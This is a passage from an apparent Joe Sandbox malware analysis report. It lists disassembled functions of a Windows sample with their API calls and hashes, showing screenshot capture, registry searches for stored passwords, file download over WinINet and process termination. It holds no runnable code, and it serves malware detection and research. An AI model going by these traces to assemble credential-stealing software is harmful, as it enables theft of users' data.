                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                        • String ID:
                        • API String ID: 2929475105-0
                        • Opcode ID: 1e60243e2ac1e3efad13f71ba790221b719e10d677a6682d52bed2dd464eb8a1
                        • Instruction ID: 0dd0e7a9915f9851f1b396ee0286b1e538601ddad75e8641124dfeda89252d61
                        • Opcode Fuzzy Hash: 1e60243e2ac1e3efad13f71ba790221b719e10d677a6682d52bed2dd464eb8a1
                        • Instruction Fuzzy Hash: F491E8B0A016088FD7309FA4DC44A7737A5EB54704F46805AEB09873A1EFBEDD518B8B
                        Function 0050C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050C8A2
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050C8D1
                        • lstrlen.KERNEL32(00000000), ref: 0050C8FC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050C932
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 0050C943
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 1c288bd26bdb59952af0cae3d997041617bb601764d02532e2c601e297a30d57
                        • Instruction ID: ceba12fae372ab4798df6b145add9428a11fde0b12de5f307993b2924e3d6ccf
                        • Opcode Fuzzy Hash: 1c288bd26bdb59952af0cae3d997041617bb601764d02532e2c601e297a30d57
                        • Instruction Fuzzy Hash: 7461F371E0121A9BDB20EFB5CD45ABE7FB8BF06300F044629E901E7291D7788D068B94
                        Function 005141E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00510CF0), ref: 00514276
                        • GetDesktopWindow.USER32 ref: 00514280
                        • GetWindowRect.USER32(00000000,?), ref: 0051428D
                        • SelectObject.GDI32(00000000,00000000), ref: 005142BF
                        • GetHGlobalFromStream.COMBASE(00510CF0,?), ref: 00514336
                        • GlobalLock.KERNEL32(?), ref: 00514340
                        • GlobalSize.KERNEL32(?), ref: 0051434D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                        • String ID:
                        • API String ID: 1264946473-0
                        • Opcode ID: dc370bfed3f819e73904ef8f9136cd578c8f67274b96816211efd8917071d2f4
                        • Instruction ID: 9b92312d424a0062e8fdbbbcb90b137dcd739ae8378a29934f75ddab58aba0b0
                        • Opcode Fuzzy Hash: dc370bfed3f819e73904ef8f9136cd578c8f67274b96816211efd8917071d2f4
                        • Instruction Fuzzy Hash: E3513F75A1020DAFDB20DFA4DD85EEE7BB9FF48304F104519FA05A3250DB78AD428BA5
                        Function 0050DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,0103DF78), ref: 0050E00D
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050E037
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E07D
                        • lstrcat.KERNEL32(?,?), ref: 0050E098
                        • lstrcat.KERNEL32(?,?), ref: 0050E0AC
                        • lstrcat.KERNEL32(?,0102B248), ref: 0050E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0050E0D4
                        • lstrcat.KERNEL32(?,0103D368), ref: 0050E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0050E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 4230089145-0
                        • Opcode ID: 8371cbb6128f20ad30e4478fa619ab7f470db5f963e0229ed2d1bc92fed451d1
                        • Instruction ID: 2135ee88b16e7e35a62a3ba09d58ba03daa46f3a115e4124d84e99ab59c06843
                        • Opcode Fuzzy Hash: 8371cbb6128f20ad30e4478fa619ab7f470db5f963e0229ed2d1bc92fed451d1
                        • Instruction Fuzzy Hash: 0D617171D1011CDBCB65DB64CD45AEDB7B4FF48300F1489A9A609A3290DBB49F86CF94
                        Function 004F6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F6AFF
                        • InternetOpenA.WININET(0051CFEC,00000001,00000000,00000000,00000000), ref: 004F6B2C
                        • StrCmpCA.SHLWAPI(?,0103E358), ref: 004F6B4A
                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 004F6B6A
                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004F6B88
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004F6BA1
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004F6BC6
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004F6BF0
                        • CloseHandle.KERNEL32(00000000), ref: 004F6C10
                        • InternetCloseHandle.WININET(00000000), ref: 004F6C17
                        • InternetCloseHandle.WININET(?), ref: 004F6C21
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                        • String ID:
                        • API String ID: 2500263513-0
                        • Opcode ID: fcab7bc368b04e2e9eb3db97f1d3527d2866dc41819cf78c0c8654aaa50616c4
                        • Instruction ID: 7d336337464174d56bb198338ed836e489dea17755e94cdc70d1cb8cbeff093f
                        • Opcode Fuzzy Hash: fcab7bc368b04e2e9eb3db97f1d3527d2866dc41819cf78c0c8654aaa50616c4
                        • Instruction Fuzzy Hash: C1418271A00219ABDB20DF64DD45FAE7778EB04700F048559FB05E7290EF78AE418BA8
                        Function 00514500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00504F39), ref: 00514545
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0051454C
                        • wsprintfW.USER32 ref: 0051455B
                        • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 005145CA
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 005145D9
                        • CloseHandle.KERNEL32(00000000,?,?), ref: 005145E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                        • String ID: 9OP$%hs$9OP
                        • API String ID: 885711575-2099957563
                        • Opcode ID: 61081f1f7791fbf0dc5f9ee4b4f2530f3092e3a703a1889b11063e391651b197
                        • Instruction ID: 8c5717e532c279f9b1268377574233ae74e0eca0355fe117b564afebd03f4ad3
                        • Opcode Fuzzy Hash: 61081f1f7791fbf0dc5f9ee4b4f2530f3092e3a703a1889b11063e391651b197
                        • Instruction Fuzzy Hash: D7316172A01209BBEB20DBE4DD49FDE7B79FF45700F104055F605E7180EB746A428BAA
                        Function 004FBBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FBC1F
                        • lstrlen.KERNEL32(00000000), ref: 004FBC52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FBC7C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FBC84
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FBCAC
                        • lstrlen.KERNEL32(00524AD4), ref: 004FBD23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: 5a0df9f04cad26f45f3e5c8a7d32d0bef35694f3d828318f48425a8fe42d9307
                        • Instruction ID: c1720798e01b823affe2e1c60f006923a669b07c9e47fff4940e622a32b2bc97
                        • Opcode Fuzzy Hash: 5a0df9f04cad26f45f3e5c8a7d32d0bef35694f3d828318f48425a8fe42d9307
                        • Instruction Fuzzy Hash: 30A16030A012098FCB25DF25D949A7F77B4EF45304F18806EE6099B361DB7ADC52CB99
                        Function 00515EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515F2A
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515F49
                        • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00516014
                        • memmove.MSVCRT(00000000,00000000,?), ref: 0051609F
                        • std::_Xinvalid_argument.LIBCPMT ref: 005160D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$memmove
                        • String ID: invalid string position$string too long
                        • API String ID: 1975243496-4289949731
                        • Opcode ID: 889b169ae673ebebd842148dd11edd5ecd47ae8db81363cbc236f0e428bbf1e1
                        • Instruction ID: 413607907151d2ffd1895642125d7bc6da0e91819048bb3adb35e0f2df2fea8b
                        • Opcode Fuzzy Hash: 889b169ae673ebebd842148dd11edd5ecd47ae8db81363cbc236f0e428bbf1e1
                        • Instruction Fuzzy Hash: A3617E70700544DBEB18CF5CC8D89AEBBB6FF88304B244959E5928B782E731ADC1CB95
                        Function 0050E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E07D
                        • lstrcat.KERNEL32(?,?), ref: 0050E098
                        • lstrcat.KERNEL32(?,?), ref: 0050E0AC
                        • lstrcat.KERNEL32(?,0102B248), ref: 0050E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0050E0D4
                        • lstrcat.KERNEL32(?,0103D368), ref: 0050E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0050E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFile
                        • String ID:
                        • API String ID: 3428472996-0
                        • Opcode ID: c3719f81ab082e8f6e28098457bf20be486c27adc2462d3e52d572b31ca1552d
                        • Instruction ID: cbf0930e9929e39d4aa5c42b296ba0ebdf4f6e4fbbf7f8cd1cdb4cb64869db4c
                        • Opcode Fuzzy Hash: c3719f81ab082e8f6e28098457bf20be486c27adc2462d3e52d572b31ca1552d
                        • Instruction Fuzzy Hash: E7418D71D1011CDBCB35EB64DD49AED77B4BF48300F1489A9BA0A93290DB789F868F94
                        Function 004F7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004F77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004F7805
                          • Part of subcall function 004F77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 004F784A
                          • Part of subcall function 004F77D0: StrStrA.SHLWAPI(?,Password), ref: 004F78B8
                          • Part of subcall function 004F77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F78EC
                          • Part of subcall function 004F77D0: HeapFree.KERNEL32(00000000), ref: 004F78F3
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 004F7A90
                        • lstrcat.KERNEL32(00000000,?), ref: 004F7ABD
                        • lstrcat.KERNEL32(00000000, : ), ref: 004F7ACF
                        • lstrcat.KERNEL32(00000000,?), ref: 004F7AF0
                        • wsprintfA.USER32 ref: 004F7B10
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F7B39
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F7B47
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 004F7B60
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
